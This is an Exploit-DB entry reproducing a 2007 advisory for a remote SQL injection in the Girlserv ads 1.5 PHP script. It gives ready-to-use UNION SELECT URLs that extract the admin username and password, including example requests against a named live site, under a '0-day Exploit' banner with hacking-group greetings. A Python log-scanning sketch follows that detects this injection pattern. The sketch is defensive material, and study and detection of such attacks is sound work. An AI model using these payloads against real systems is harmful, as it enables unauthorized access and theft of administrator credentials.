- 18 Dec 2022
- EDB-ID: 4142
- EDB Verified: Passed
- Author: COLD ZERO
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: CVE-2007-3583
- Publication date: 2007-07-03
Code:
Girlserv ads <= 1.5 Remote SQL Injection Vulnerability
Found By : Cold z3ro , [email protected]
Homepages : http://hackteach.org , http://h4ps.com
Script : http://www.girlserv-demo.com/girlserv-ads1.5.zip
For Admin :
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
For password :
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*
Example ;
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*
=================================================
0-day Exploit :)
=================================================
Greets : Hackteach members , Pal-hacker.com admins , xp10.com members , and
All friend
=============================================
Cold !F iT z3ro , No One Equal One
=============================================
#Long life Palestine
#http://hackteach.org
# milw0rm.com [2007-07-03]
- Source: www.exploit-db.com
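A detection sketch for the request pattern shown above, added here as an example and not part of the original advisory or the Girlserv code: it scans web access logs for `details_news.php` requests whose `idnew` value is not a plain number, undoing URL-encoding and the `/**/` comment-as-whitespace trick before matching. The log lines are constructed, the function names are hypothetical, and it assumes legitimate `idnew` values are unsigned integers.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (common log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jul/2007:10:00:01 +0000] "GET /ads/details_news.php?n=det&idnew=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/Jul/2007:10:00:05 +0000] "GET /ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/* HTTP/1.1" 200 4987',
    '203.0.113.9 - - [03/Jul/2007:10:00:09 +0000] "GET /ads/details_news.php?n=det&idnew=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,1 HTTP/1.1" 200 4990',
    '198.51.100.7 - - [03/Jul/2007:10:01:00 +0000] "GET /ads/index.php?q=union+select HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r'\bunion\b(?:\s+all)?\s+select\b')

def normalize(value):
    """Undo URL-encoding and SQL comments used in place of whitespace."""
    for _ in range(2):                          # tolerate double-encoded input
        value = unquote(value)
    value = re.sub(r'/\*.*?\*/', ' ', value)    # closed /**/ comments act as spaces
    value = value.replace('/*', ' ')            # trailing unterminated comment
    return re.sub(r'\s+', ' ', value).strip().lower()

def classify_idnew(raw):
    """Return None for a plain numeric id (assumed legitimate), else a reason."""
    norm = normalize(raw)
    if re.fullmatch(r'\d+', norm):
        return None
    if UNION_RE.search(norm):
        return 'union-select in idnew'
    return 'non-numeric idnew'

def scan(lines, script='details_news.php', param='idnew'):
    """Return (client_ip, reason) for each suspicious request to the script."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith('/' + script):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            reason = classify_idnew(value) if key == param else None
            if reason:
                findings.append((line.split()[0], reason))
    return findings

if __name__ == '__main__':
    print(scan(SAMPLE_LOG))
```

The fourth sample line is ignored on purpose: the check is scoped to the `idnew` parameter of `details_news.php`, where any non-numeric value is already an anomaly.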